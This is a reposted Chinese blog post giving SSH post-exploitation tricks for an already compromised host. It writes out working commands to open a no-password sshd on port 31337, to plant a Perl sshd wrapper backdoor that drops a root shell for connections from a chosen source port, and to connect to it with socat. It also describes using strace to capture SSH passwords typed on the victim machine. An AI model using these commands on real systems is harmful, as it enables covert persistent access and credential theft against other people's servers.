渗透技巧之ssh
来源:互联网 发布:linux同名文件夹合并 编辑:程序博客网 时间:2024/05/19 19:39
原文地址:http://www.anquan.us/static/drops/tips-1951.html
1. 入侵得到SHELL后,对方防火墙没限制,想快速开放一个可以访问的SSH端口
肉鸡上执行
mickey@vic:~# ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=31337;
就会派生一个31337端口,然后连接31337,用root/bin/ftp/mail当用户名,密码随意,就可登陆。
效果图:
2. 做一个SSH wrapper后门,效果比第一个好,没有开放额外的端口,只要对方开了SSH服务,就能远程连接
在肉鸡上执行:
[root@localhost ~]# cd /usr/sbin[root@localhost sbin]# mv sshd ../bin[root@localhost sbin]# echo '#!/usr/bin/perl' >sshd[root@localhost sbin]# echo 'exec "/bin/sh" if (getpeername(STDIN) =~ /^..4A/);' >>sshd[root@localhost sbin]# echo 'exec {"/usr/bin/sshd"} "/usr/sbin/sshd",@ARGV,' >>sshd[root@localhost sbin]# chmod u+x sshd[root@localhost sbin]# /etc/init.d/sshd restart
在本机执行:
socat STDIO TCP4:10.18.180.20:22,sourceport=13377
如果你想修改源端口,可以用python的struct标准库实现
>>> import struct>>> buffer = struct.pack('>I6',19526)>>> print repr(buffer)'\x00\x00LF'>>> buffer = struct.pack('>I6',13377)>>> print buffer4A
效果图如下:
3. 记录SSH客户端连接密码
搞定主机后,往往想记录肉鸡SSH连接到其他主机的密码,进一步扩大战果,使用strace命令就行了。
效果图:
阅读全文
0 0
- 渗透技巧之ssh
- [渗透测试] SSH
- 渗透利器Weevely之奇淫技巧篇
- 渗透利器Weevely之奇淫技巧篇
- SSH整合之分页技巧
- 渗透技巧不定期更新
- 渗透技巧总结
- Linux渗透技巧+实战
- 渗透小技巧一则
- 渗透测试技巧分享
- 域控渗透技巧
- 域内渗透基本技巧
- 内网渗透技巧
- 【内网渗透】域渗透技巧
- Metasploit渗透技巧:后渗透Meterpreter代理
- Metasploit渗透技巧:后渗透Meterpreter代理
- linux渗透的小技巧
- 渗透技巧笔记 - 落泪红尘
- 顺时针打印矩阵
- PostgreSQL入门到精通——世界上功能最强大的开源数据库
- for and while
- qemu结合gdb调试龙芯1c的裸机程序helloworld
- jquery简单的用户名密码验证
- 渗透技巧之ssh
- 【干货技术贴】之-mac下如何安装WebStorm + 破解
- Jmeter接口测试+压力测试
- Mathematics for 3D Game Programming and Computer Graphics基础学习
- 课程表(div)
- Maven提高篇系列之(二)——配置Plugin到某个Phase(以Selenium集成测试为例)
- mybatis 出现 Value '0000-00-00' can not be represented as java.sql.Date
- JAVA程序调用javax.mail发送邮件
- eclipse启动tomcat后项目无法访问localhost:8080,而通过startup.bat启动后却能访问